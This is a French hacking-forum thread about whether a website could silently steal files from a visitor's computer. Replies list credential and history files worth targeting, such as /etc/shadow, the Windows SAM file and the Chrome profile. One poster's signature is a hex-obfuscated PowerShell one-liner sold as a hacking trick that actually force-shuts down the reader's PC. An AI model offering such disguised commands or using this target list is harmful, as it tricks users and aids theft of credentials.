Annonce

Réduire
Aucune annonce.

Steal des fichiers du pc depuis un site web

Réduire
X
 
  • Filtre
  • Heure
  • Afficher
Tout nettoyer
nouveaux messages

  • Steal des fichiers du pc depuis un site web

    Bonjour

    Un ami m'a dit qu'il avait fait un site web qui prenait tes donné ,il disait que ça marchait comme l'upload mais sans autorisation et avec un chemin prédéfinis
    comment il a fait ???!!!
    merci d'avoir lu mon message même si cela semble stupide

  • #2
    Bonjour,

    L'énoncé est un peu leger pour se faire une idée précise. Normalement, il faudrait une démo ou un truc dans le genre (proof of concept) pour y croire, mais comme c'est plus facile de ne pas croire à un truc qui pourrait exister que de l'envisager, on va prendre l'option la plus intéressante : on va dire que l'énoncé est vrai !

    De mon humble propre point de vue, il doit y avoir un souci avec le "tes données" dans ton énoncé. Si le chemin est prédéfini, on ne peut récupérer que ce qui se trouve à l'emplacement ainsi prédéfini (ce qui veut aussi dire un nom de fichier). Alors, soit on sait ce qu'on veut récupérer, probablement par social engineering, et on peut ainsi préparer l'emplacement voulu, soit c'est la pêche à la chance. Ensuite, on ne sait pas avec quel navigateur et quelle "release" c'est sensé fonctionner. Pas sûr qu'un truc qui marche avec opera fonctionne avec firefox, chrome ou le machin de microsoft (je ne sais plus le nom).

    D'un aspect purement technique, je ne sais pas. Mais que l'on puisse, avec du javascript, automatiser la fonction qui consiste à faire "upload", "select file" et "send" ne me paraitrait absolument pas déconnant. On peut bien faire envoyer des posts de façon automatique, donc pourquoi pas. D'un point de vue sécurité, je ne suis pas sûr qu'il s'agisse d'une grosse vulnérabilité, car il faut savoir à l'avance ce que l'on veut récupérer. Après, ça peut faire partie d'une boite à outils, en parrallèle d'autres actuces.

    Commentaire


    • #3
      Et si j'ai le chemin absolu cela donne quoi à peu près ?
      sinon d'après lui c'est une faille qui marche sur Chrome et mozilla ,ou alors i à trouver deux failles
      merci de ta réponse rapide

      Commentaire


      • #4
        Il va me faire tester le site mais je ne serais plus disponible pendant 10jours, donc je vous informerai
        je me suis dit de hack son site pour lui voler son script mais c'est un pote

        Commentaire


        • #5
          Un peu étrange ton histoire..

          Commentaire


          • #6
            C'est beaucoup plus classe d'arriver à faire pareil sans lui voler son script...

            Perso, je commencerai par gratter sur ce genre de pages :
            https://stackoverflow.com/questions/...ected/25893747

            Et ici, ce qui contredit complètement ce que j'ai écris plus haut :
            https://stackoverflow.com/questions/...r-intervention

            etc.

            Commentaire


            • #7
              Typiquement le genre de message qui m'exaspère. On ne sait pas de quoi il en retourne, même de loin. Aucune investigation personnelle (merci de faire le job pour moi...).

              Par ailleurs, ce forum est en langue française. Donc, on ne "steal" pas mais on dérobe. Je n'ai rien contre la langue de Shakespeare mais encore faut-il ne pas la maltraiter.

              Et l'apothéose : "il faudrait que je hacke le forum de mon pote pour avoir le code". De mon point de vue, cela n'aurait mérité aucune réponse. Disons que je fais une exception...


              Commentaire


              • #8
                Envoyé par acloseone Voir le message
                D'un point de vue sécurité, je ne suis pas sûr qu'il s'agisse d'une grosse vulnérabilité, car il faut savoir à l'avance ce que l'on veut récupérer.
                Là comme ça en 5 seconde, j'ai déjà pleins d'idées. Alors imagine un peu si on prend le temps de réfléchir à une vrai liste
                sous linux :
                /etc/shadow
                /var/log/messages
                ~/.bash_history
                etc

                sous windows :
                C:\Windows\System32\config\SAM
                C:\Users\$username\AppData\Local\Google\Chrome\User Data\Default\
                etc

                Et je n'aborde pas les cas spécifiques de confs de services, dont certains stockent des mdp en clair dans des fichiers de conf (dont le chemin est connu).

                Donc si, ce serai une boucherie.



                Hack like a pro :
                PS > iex $(-join('73746F702D636F6D7075746572202D466F726365' -split '(?<=\G.{2})',20|%{[char][int]"0x$_"}))

                Commentaire


                • #9
                  Effectivement (même si pour /etc/shadow, ce n'est pas possible). C'était d'ailleurs une raison pour laquelle j'avais limité l'accés de mon navigateur qu'à quelques dossiers dans /home/ avec apparmor... preuve qu'on oublie tout avec le temps !

                  Ca veut aussi dire qu'il n'était venu que pour vérifier si ça valait le coup d'essayer et que son histoire était fausse (si on part de cet angle et non plus de celui de son énoncé, ce n'est effectivement pas possible, ça serait une 0 day trop sévère). Gageons que dans 10 jours, il reviendra en disant que ça na marche finalement pas... (enfin non, là, il ne reviendra pas...)

                  Par contre, ce qui me surprend pas mal, c'est le pourcentage de demandes bidons qui sévissent sur ce forum (ça doit être pareil sur tous les forums liés au hacking)... Ca commence à en faire un paquet en peu de temps.
                  Dernière modification par acloseone, 28 juillet 2018, 08h26.

                  Commentaire


                  • #10
                    Oui, il ne reviendra pas
                    Les demandes bidons, c'est hélas le lot commun des forums ouverts à tous. Là ou ça devient un vrai problème, c'est quand la modération est peu active.
                    Hack like a pro :
                    PS > iex $(-join('73746F702D636F6D7075746572202D466F726365' -split '(?<=\G.{2})',20|%{[char][int]"0x$_"}))

                    Commentaire

                    Chargement...
                    X